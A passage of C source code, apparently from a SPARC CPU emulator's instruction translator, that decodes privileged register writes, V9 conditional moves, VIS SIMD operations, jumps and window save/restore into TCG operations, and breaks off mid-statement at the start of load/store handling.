tcg_temp_free_ptr(tcg_ctx, r_tickptr); /* End TB to handle timer interrupt */ dc->base.is_jmp = DISAS_EXIT; } break; case 5: // tba tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_tbr, cpu_tmp0); break; case 6: // pstate save_state(dc); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_wrpstate(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_end(); } dc->npc = DYNAMIC_PC; break; case 7: // tl save_state(dc); tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, tl)); dc->npc = DYNAMIC_PC; break; case 8: // pil if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_wrpil(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_end(); } break; case 9: // cwp gen_helper_wrcwp(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); break; case 10: // cansave tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, cansave)); break; case 11: // canrestore tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, canrestore)); break; case 12: // cleanwin tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, cleanwin)); break; case 13: // otherwin tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, otherwin)); break; case 14: // wstate tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, wstate)); break; case 16: // UA2005 gl CHECK_IU_FEATURE(dc, GL); gen_helper_wrgl(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); break; case 26: // UA2005 strand status CHECK_IU_FEATURE(dc, HYPV); if (!hypervisor(dc)) goto priv_insn; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_ssr, cpu_tmp0); break; default: goto illegal_insn; } #else tcg_gen_trunc_tl_i32(tcg_ctx, tcg_ctx->cpu_wim, cpu_tmp0); if (dc->def->nwindows != 32) { tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_wim, tcg_ctx->cpu_wim, (1 << dc->def->nwindows) - 1); } #endif } break; case 0x33: /* wrtbr, UA2005 wrhpr */ { #ifndef TARGET_SPARC64 if (!supervisor(dc)) goto priv_insn; tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_tbr, cpu_src1, cpu_src2); #else CHECK_IU_FEATURE(dc, HYPV); if (!hypervisor(dc)) goto priv_insn; cpu_tmp0 = get_temp_tl(dc); tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); switch (rd) { case 0: // hpstate tcg_gen_st_i64(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, hpstate)); save_state(dc); gen_op_next_insn(tcg_ctx); tcg_gen_exit_tb(tcg_ctx, NULL, 0); dc->base.is_jmp = DISAS_NORETURN; break; case 1: // htstate // XXX gen_op_wrhtstate(); break; case 3: // hintp tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_hintp, cpu_tmp0); break; case 5: // htba tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_htba, cpu_tmp0); break; case 31: // hstick_cmpr { TCGv_ptr r_tickptr; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_hstick_cmpr, cpu_tmp0); r_tickptr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, offsetof(CPUSPARCState, hstick)); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_tick_set_limit(tcg_ctx, r_tickptr, tcg_ctx->cpu_hstick_cmpr); tcg_temp_free_ptr(tcg_ctx, r_tickptr); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_end(); } /* End TB to handle timer interrupt */ dc->base.is_jmp = DISAS_EXIT; } break; case 6: // hver readonly default: goto illegal_insn; } #endif } break; #ifdef TARGET_SPARC64 case 0x2c: /* V9 movcc */ { int cc = GET_FIELD_SP(insn, 11, 12); int cond = GET_FIELD_SP(insn, 14, 17); DisasCompare cmp; TCGv dst; if (insn & (1 << 18)) { if (cc == 0) { gen_compare(&cmp, 0, cond, dc); } else if (cc == 2) { gen_compare(&cmp, 1, cond, dc); } else { goto illegal_insn; } } else { gen_fcompare(tcg_ctx, &cmp, cc, cond); } /* The get_src2 above loaded the normal 13-bit immediate field, not the 11-bit field we have in movcc. But it did handle the reg case. */ if (IS_IMM) { simm = GET_FIELD_SPs(insn, 0, 10); tcg_gen_movi_tl(tcg_ctx, cpu_src2, simm); } dst = gen_load_gpr(dc, rd); tcg_gen_movcond_tl(tcg_ctx, cmp.cond, dst, cmp.c1, cmp.c2, cpu_src2, dst); free_compare(tcg_ctx, &cmp); gen_store_gpr(dc, rd, dst); break; } case 0x2d: /* V9 sdivx */ gen_helper_sdivx(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); gen_store_gpr(dc, rd, cpu_dst); break; case 0x2e: /* V9 popc */ tcg_gen_ctpop_tl(tcg_ctx, cpu_dst, cpu_src2); gen_store_gpr(dc, rd, cpu_dst); break; case 0x2f: /* V9 movr */ { int cond = GET_FIELD_SP(insn, 10, 12); DisasCompare cmp; TCGv dst; gen_compare_reg(tcg_ctx, &cmp, cond, cpu_src1); /* The get_src2 above loaded the normal 13-bit immediate field, not the 10-bit field we have in movr. But it did handle the reg case. */ if (IS_IMM) { simm = GET_FIELD_SPs(insn, 0, 9); tcg_gen_movi_tl(tcg_ctx, cpu_src2, simm); } dst = gen_load_gpr(dc, rd); tcg_gen_movcond_tl(tcg_ctx, cmp.cond, dst, cmp.c1, cmp.c2, cpu_src2, dst); free_compare(tcg_ctx, &cmp); gen_store_gpr(dc, rd, dst); break; } #endif default: goto illegal_insn; } } } else if (xop == 0x36) { /* UltraSparc shutdown, VIS, V8 CPop1 */ #ifdef TARGET_SPARC64 int opf = GET_FIELD_SP(insn, 5, 13); rs1 = GET_FIELD(insn, 13, 17); rs2 = GET_FIELD(insn, 27, 31); if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } switch (opf) { case 0x000: /* VIS I edge8cc */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 8, 1, 0); gen_store_gpr(dc, rd, cpu_dst); break; case 0x001: /* VIS II edge8n */ CHECK_FPU_FEATURE(dc, VIS2); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 8, 0, 0); gen_store_gpr(dc, rd, cpu_dst); break; case 0x002: /* VIS I edge8lcc */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 8, 1, 1); gen_store_gpr(dc, rd, cpu_dst); break; case 0x003: /* VIS II edge8ln */ CHECK_FPU_FEATURE(dc, VIS2); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 8, 0, 1); gen_store_gpr(dc, rd, cpu_dst); break; case 0x004: /* VIS I edge16cc */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 16, 1, 0); gen_store_gpr(dc, rd, cpu_dst); break; case 0x005: /* VIS II edge16n */ CHECK_FPU_FEATURE(dc, VIS2); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 16, 0, 0); gen_store_gpr(dc, rd, cpu_dst); break; case 0x006: /* VIS I edge16lcc */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 16, 1, 1); gen_store_gpr(dc, rd, cpu_dst); break; case 0x007: /* VIS II edge16ln */ CHECK_FPU_FEATURE(dc, VIS2); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 16, 0, 1); gen_store_gpr(dc, rd, cpu_dst); break; case 0x008: /* VIS I edge32cc */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 32, 1, 0); gen_store_gpr(dc, rd, cpu_dst); break; case 0x009: /* VIS II edge32n */ CHECK_FPU_FEATURE(dc, VIS2); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 32, 0, 0); gen_store_gpr(dc, rd, cpu_dst); break; case 0x00a: /* VIS I edge32lcc */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 32, 1, 1); gen_store_gpr(dc, rd, cpu_dst); break; case 0x00b: /* VIS II edge32ln */ CHECK_FPU_FEATURE(dc, VIS2); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 32, 0, 1); gen_store_gpr(dc, rd, cpu_dst); break; case 0x010: /* VIS I array8 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_helper_array8(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); gen_store_gpr(dc, rd, cpu_dst); break; case 0x012: /* VIS I array16 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_helper_array8(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); tcg_gen_shli_i64(tcg_ctx, cpu_dst, cpu_dst, 1); gen_store_gpr(dc, rd, cpu_dst); break; case 0x014: /* VIS I array32 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_helper_array8(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); tcg_gen_shli_i64(tcg_ctx, cpu_dst, cpu_dst, 2); gen_store_gpr(dc, rd, cpu_dst); break; case 0x018: /* VIS I alignaddr */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_alignaddr(tcg_ctx, cpu_dst, cpu_src1, cpu_src2, 0); gen_store_gpr(dc, rd, cpu_dst); break; case 0x01a: /* VIS I alignaddrl */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_alignaddr(tcg_ctx, cpu_dst, cpu_src1, cpu_src2, 1); gen_store_gpr(dc, rd, cpu_dst); break; case 0x019: /* VIS II bmask */ CHECK_FPU_FEATURE(dc, VIS2); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); tcg_gen_add_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_gsr, tcg_ctx->cpu_gsr, cpu_dst, 32, 32); gen_store_gpr(dc, rd, cpu_dst); break; case 0x020: /* VIS I fcmple16 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_helper_fcmple16(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); gen_store_gpr(dc, rd, cpu_dst); break; case 0x022: /* VIS I fcmpne16 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_helper_fcmpne16(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); gen_store_gpr(dc, rd, cpu_dst); break; case 0x024: /* VIS I fcmple32 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_helper_fcmple32(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); gen_store_gpr(dc, rd, cpu_dst); break; case 0x026: /* VIS I fcmpne32 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_helper_fcmpne32(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); gen_store_gpr(dc, rd, cpu_dst); break; case 0x028: /* VIS I fcmpgt16 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_helper_fcmpgt16(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); gen_store_gpr(dc, rd, cpu_dst); break; case 0x02a: /* VIS I fcmpeq16 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_helper_fcmpeq16(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); gen_store_gpr(dc, rd, cpu_dst); break; case 0x02c: /* VIS I fcmpgt32 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_helper_fcmpgt32(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); gen_store_gpr(dc, rd, cpu_dst); break; case 0x02e: /* VIS I fcmpeq32 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_helper_fcmpeq32(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); gen_store_gpr(dc, rd, cpu_dst); break; case 0x031: /* VIS I fmul8x16 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8x16); break; case 0x033: /* VIS I fmul8x16au */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8x16au); break; case 0x035: /* VIS I fmul8x16al */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8x16al); break; case 0x036: /* VIS I fmul8sux16 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8sux16); break; case 0x037: /* VIS I fmul8ulx16 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8ulx16); break; case 0x038: /* VIS I fmuld8sux16 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmuld8sux16); break; case 0x039: /* VIS I fmuld8ulx16 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmuld8ulx16); break; case 0x03a: /* VIS I fpack32 */ CHECK_FPU_FEATURE(dc, VIS1); gen_gsr_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpack32); break; case 0x03b: /* VIS I fpack16 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs2); cpu_dst_32 = gen_dest_fpr_F(dc); gen_helper_fpack16(tcg_ctx, cpu_dst_32, tcg_ctx->cpu_gsr, cpu_src1_64); gen_store_fpr_F(dc, rd, cpu_dst_32); break; case 0x03d: /* VIS I fpackfix */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs2); cpu_dst_32 = gen_dest_fpr_F(dc); gen_helper_fpackfix(tcg_ctx, cpu_dst_32, tcg_ctx->cpu_gsr, cpu_src1_64); gen_store_fpr_F(dc, rd, cpu_dst_32); break; case 0x03e: /* VIS I pdist */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDDD(dc, rd, rs1, rs2, gen_helper_pdist); break; case 0x048: /* VIS I faligndata */ CHECK_FPU_FEATURE(dc, VIS1); gen_gsr_fop_DDD(dc, rd, rs1, rs2, gen_faligndata); break; case 0x04b: /* VIS I fpmerge */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpmerge); break; case 0x04c: /* VIS II bshuffle */ CHECK_FPU_FEATURE(dc, VIS2); gen_gsr_fop_DDD(dc, rd, rs1, rs2, gen_helper_bshuffle); break; case 0x04d: /* VIS I fexpand */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fexpand); break; case 0x050: /* VIS I fpadd16 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpadd16); break; case 0x051: /* VIS I fpadd16s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, gen_helper_fpadd16s); break; case 0x052: /* VIS I fpadd32 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpadd32); break; case 0x053: /* VIS I fpadd32s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_add_i32); break; case 0x054: /* VIS I fpsub16 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpsub16); break; case 0x055: /* VIS I fpsub16s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, gen_helper_fpsub16s); break; case 0x056: /* VIS I fpsub32 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpsub32); break; case 0x057: /* VIS I fpsub32s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_sub_i32); break; case 0x060: /* VIS I fzero */ CHECK_FPU_FEATURE(dc, VIS1); cpu_dst_64 = gen_dest_fpr_D(dc, rd); tcg_gen_movi_i64(tcg_ctx, cpu_dst_64, 0); gen_store_fpr_D(dc, rd, cpu_dst_64); break; case 0x061: /* VIS I fzeros */ CHECK_FPU_FEATURE(dc, VIS1); cpu_dst_32 = gen_dest_fpr_F(dc); tcg_gen_movi_i32(tcg_ctx, cpu_dst_32, 0); gen_store_fpr_F(dc, rd, cpu_dst_32); break; case 0x062: /* VIS I fnor */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_nor_i64); break; case 0x063: /* VIS I fnors */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_nor_i32); break; case 0x064: /* VIS I fandnot2 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_andc_i64); break; case 0x065: /* VIS I fandnot2s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_andc_i32); break; case 0x066: /* VIS I fnot2 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DD(dc, rd, rs2, tcg_gen_not_i64); break; case 0x067: /* VIS I fnot2s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FF(dc, rd, rs2, tcg_gen_not_i32); break; case 0x068: /* VIS I fandnot1 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs2, rs1, tcg_gen_andc_i64); break; case 0x069: /* VIS I fandnot1s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs2, rs1, tcg_gen_andc_i32); break; case 0x06a: /* VIS I fnot1 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DD(dc, rd, rs1, tcg_gen_not_i64); break; case 0x06b: /* VIS I fnot1s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FF(dc, rd, rs1, tcg_gen_not_i32); break; case 0x06c: /* VIS I fxor */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_xor_i64); break; case 0x06d: /* VIS I fxors */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_xor_i32); break; case 0x06e: /* VIS I fnand */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_nand_i64); break; case 0x06f: /* VIS I fnands */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_nand_i32); break; case 0x070: /* VIS I fand */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_and_i64); break; case 0x071: /* VIS I fands */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_and_i32); break; case 0x072: /* VIS I fxnor */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_eqv_i64); break; case 0x073: /* VIS I fxnors */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_eqv_i32); break; case 0x074: /* VIS I fsrc1 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); gen_store_fpr_D(dc, rd, cpu_src1_64); break; case 0x075: /* VIS I fsrc1s */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_32 = gen_load_fpr_F(dc, rs1); gen_store_fpr_F(dc, rd, cpu_src1_32); break; case 0x076: /* VIS I fornot2 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_orc_i64); break; case 0x077: /* VIS I fornot2s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_orc_i32); break; case 0x078: /* VIS I fsrc2 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs2); gen_store_fpr_D(dc, rd, cpu_src1_64); break; case 0x079: /* VIS I fsrc2s */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_32 = gen_load_fpr_F(dc, rs2); gen_store_fpr_F(dc, rd, cpu_src1_32); break; case 0x07a: /* VIS I fornot1 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs2, rs1, tcg_gen_orc_i64); break; case 0x07b: /* VIS I fornot1s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs2, rs1, tcg_gen_orc_i32); break; case 0x07c: /* VIS I for */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_or_i64); break; case 0x07d: /* VIS I fors */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_or_i32); break; case 0x07e: /* VIS I fone */ CHECK_FPU_FEATURE(dc, VIS1); cpu_dst_64 = gen_dest_fpr_D(dc, rd); tcg_gen_movi_i64(tcg_ctx, cpu_dst_64, -1); gen_store_fpr_D(dc, rd, cpu_dst_64); break; case 0x07f: /* VIS I fones */ CHECK_FPU_FEATURE(dc, VIS1); cpu_dst_32 = gen_dest_fpr_F(dc); tcg_gen_movi_i32(tcg_ctx, cpu_dst_32, -1); gen_store_fpr_F(dc, rd, cpu_dst_32); break; case 0x080: /* VIS I shutdown */ case 0x081: /* VIS II siam */ // XXX goto illegal_insn; default: goto illegal_insn; } #else goto ncp_insn; #endif } else if (xop == 0x37) { /* V8 CPop2, V9 impdep2 */ #ifdef TARGET_SPARC64 goto illegal_insn; #else goto ncp_insn; #endif #ifdef TARGET_SPARC64 } else if (xop == 0x39) { /* V9 return */ save_state(dc); cpu_src1 = get_src1(dc, insn); cpu_tmp0 = get_temp_tl(dc); if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 19, 31); tcg_gen_addi_tl(tcg_ctx, cpu_tmp0, cpu_src1, simm); } else { /* register */ rs2 = GET_FIELD(insn, 27, 31); if (rs2) { cpu_src2 = gen_load_gpr(dc, rs2); tcg_gen_add_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); } else { tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, cpu_src1); } } gen_helper_restore(tcg_ctx, tcg_ctx->cpu_env); gen_mov_pc_npc(dc); gen_check_align(tcg_ctx, cpu_tmp0, 3); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_npc, cpu_tmp0); dc->npc = DYNAMIC_PC; goto jmp_insn; #endif } else { cpu_src1 = get_src1(dc, insn); cpu_tmp0 = get_temp_tl(dc); if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 19, 31); tcg_gen_addi_tl(tcg_ctx, cpu_tmp0, cpu_src1, simm); } else { /* register */ rs2 = GET_FIELD(insn, 27, 31); if (rs2) { cpu_src2 = gen_load_gpr(dc, rs2); tcg_gen_add_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); } else { tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, cpu_src1); } } switch (xop) { case 0x38: /* jmpl */ { TCGv t = gen_dest_gpr(dc, rd); tcg_gen_movi_tl(tcg_ctx, t, dc->pc); gen_store_gpr(dc, rd, t); gen_mov_pc_npc(dc); gen_check_align(tcg_ctx, cpu_tmp0, 3); gen_address_mask(dc, cpu_tmp0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_npc, cpu_tmp0); dc->npc = DYNAMIC_PC; } goto jmp_insn; #if !defined(TARGET_SPARC64) case 0x39: /* rett, V9 return */ { if (!supervisor(dc)) goto priv_insn; gen_mov_pc_npc(dc); gen_check_align(tcg_ctx, cpu_tmp0, 3); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_npc, cpu_tmp0); dc->npc = DYNAMIC_PC; gen_helper_rett(tcg_ctx, tcg_ctx->cpu_env); } goto jmp_insn; #endif case 0x3b: /* flush */ if (!((dc)->def->features & CPU_FEATURE_FLUSH)) goto unimp_flush; /* nop */ break; case 0x3c: /* save */ gen_helper_save(tcg_ctx, tcg_ctx->cpu_env); gen_store_gpr(dc, rd, cpu_tmp0); break; case 0x3d: /* restore */ gen_helper_restore(tcg_ctx, tcg_ctx->cpu_env); gen_store_gpr(dc, rd, cpu_tmp0); break; #if defined(TARGET_SPARC64) case 0x3e: /* V9 done/retry */ { switch (rd) { case 0: if (!supervisor(dc)) goto priv_insn; dc->npc = DYNAMIC_PC; dc->pc = DYNAMIC_PC; if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_done(tcg_ctx, tcg_ctx->cpu_env); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_end(); } goto jmp_insn; case 1: if (!supervisor(dc)) goto priv_insn; dc->npc = DYNAMIC_PC; dc->pc = DYNAMIC_PC; if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_retry(tcg_ctx, tcg_ctx->cpu_env); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_end(); } goto jmp_insn; default: goto illegal_insn; } } break; #endif default: goto illegal_insn; } } break; } break; case 3: /* load/store instructions */ { unsigned int xop = GET_FIELD(insn, 7, 12); /* ??? gen_address_mask prevents us from using a source register directly. Always generate a temporary. */ TCGv cpu_addr = get_temp_tl(dc); tcg_gen_mov_tl(tcg_ctx, cpu_addr, get_src1(dc, insn)); if (xop == 0x3c || xop == 0x3e) { /* V9 casa/casxa : no offset */ } else if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 19, 31); if (simm != 0) { tcg_gen_addi_tl(tcg_ctx, cpu_addr, cpu_addr, simm); } } else { /* register */ rs2 = GET_FIELD(insn, 27, 31); if (rs2 != 0) { tcg_gen_add_tl(tcg_ctx, cpu_addr, cpu_addr, gen_load_gpr(dc, rs2)); } } if (xop < 4 || (xop > 7 && xop < 0x14 && xop != 0x0e) || (xop > 0x17 && xop <= 0x1d ) || (xop > 0x2c && xop <= 0x33) || xop == 0x1f || xop == 0x3d) { TCGv cpu_val = 